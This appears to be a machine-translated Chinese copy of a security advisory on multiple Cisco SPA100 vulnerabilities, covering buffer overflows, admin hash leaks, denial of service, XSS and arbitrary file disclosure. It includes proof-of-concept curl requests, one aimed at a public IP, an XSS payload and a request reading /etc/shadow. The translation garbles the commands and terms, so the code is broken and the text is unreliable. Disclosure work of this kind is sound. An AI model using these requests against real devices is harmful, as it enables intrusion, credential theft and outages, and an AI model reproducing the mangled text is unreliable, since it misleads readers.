思科SPA100系列多个漏洞

在思科SPA100系列站得住脚的发现多个漏洞。

cve - 2019 - 15240 - cve - 2019 - 15252:多个缓冲区溢出(远程代码执行)

多个缓冲区溢出漏洞(在堆栈和堆)可以通过触发的HTTP请求。一个身份验证的远程攻击者可能会利用这些执行代码。

概念验证

注意:这只是一种引发缓冲区溢出。

curl - i - s - k - x '后' \ - h美元的主持人:192.168.1.122 - h的内容长度:188美元- h的内容类型:应用程序/ x-www-form-urlencoded \美元,美元data-binary ' \ x0d \ x0asubmit_button = Remote_access&submit_type = del_remote&change_action = gozila_cgi&remove_id = Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A ' \ ' http://192.168.1.122/apply.cgi; session_id = f48ce7c27d0f652fd031191450819cbe的美元

我们也发表了一份充分利用GitHub PoC回购(https://github.com/tenable/poc/blob/master/cisco/spagett.py)。

cve - 2019 - 12708: Submit按钮任意ASP页面渲染管理员哈希泄漏特权升级

通过发送一个POST请求申请。cgi submit_button User_Level”的价值,一个经过验证的攻击者可能揭示了管理员的密码散列。管理散列将身体的反应,和这个值可以用来提升特权。

概念验证

curl - i - s - k - x '后' \ - h美元的主持人:50.71.132.182 - h的内容长度:49 - h美元的内容类型:应用程序/ x-www-form-urlencoded \——data-binary ' submit_button = User_Level&change_action = gozila_cgi ' \美元“http://50.71.132.182/apply.cgi; session_id = 8 bc7ff856b23540d2737e266b94640bd”

cve - 2019 - 15257:配置备份管理员哈希泄漏特权升级

通过执行一个HTTP GET /。cfg、NVRAM的编码复制配置将被归还。这是微不足道的解码,包括管理散列和思科哈希,你可以用它来登录。一个经过验证的攻击者可以利用这个升级特权。

cve - 2019 - 15258:添加最喜欢的帮助索引拒绝服务

一个身份验证请求发送申请。cgi的价值help_page但没有“help_idx”会导致崩溃。它导致httpd null指针。需要重启设备为了得到httpd再次运行。

概念验证

curl - i - s - k - x美元“POST”\“主持人:192.168.1.123”- h美元- h的内容类型:应用程序/ x-www-form-urlencoded - h的内容长度:93 \——data-binary美元' submit_button =帮助/ help&submit_type = fav_add&change_action = gozila_cgi&help_page = 1美元\ ' http://192.168.1.123/apply.cgi; session_id = a534c87e1fe5d0f49498cd9cbed1d4cd '

cve - 2019 - 12702: GUI操作反映了跨站脚本

的申请。cgi的gui_action POST参数值并不是之前验证在浏览器中反映其价值。经过身份验证的攻击者可能会利用这个注入并执行恶意客户端JavaScript。

概念验证

gui_action =, > <脚本> < img src = x onerror =警报(xss) > < /脚本> < !—

cve - 2019 - 12703:存储通过DHCP跨站点脚本

DHCP客户端(SPA122“互联网”的端口上运行,或唯一的港口SPA112)接受和显示Web UI的DHCP“域名”选项没有任何逃避或验证,导致XSS。恶意DHCP服务器可以使用这种偷管理员凭证,如果管理员登录和视图恶意DHCP服务器配置,其中包括Javascript在域名参数。XSS是通过访问触发状态>系统信息页面。

SPA122的DHCP服务器(SPA112没有此功能)将接受并显示在Web UI DHCP客户端主机名,导致XSS。攻击者可以利用这个通过发送DHCP客户端主机名。XSS可以通过访问触发状态> DHCP服务器的信息。

cve - 2019 - 12704:下一页任意文件披露

next_page参数值可以制作显示磁盘上的任意文件路径的内容。这可能是攻击者利用一个经过验证的。

注意:这个也可以用来提升特权通过阅读/ www / User_Level.asp。

的概念:

curl - i - s - k - x美元“POST”\“主持人:192.168.1.122”- h美元- h的内容类型:应用程序/ x-www-form-urlencoded - h的内容长度:81 \——data-binary美元' submit_button = hax&submit_type = hax&change_action = gozila_cgi&next_page = / etc /阴影' \ ' http://192.168.1.122/apply.cgi; session_id = 73320 cc2a9534cfeb0e6141f9ed52bb8美元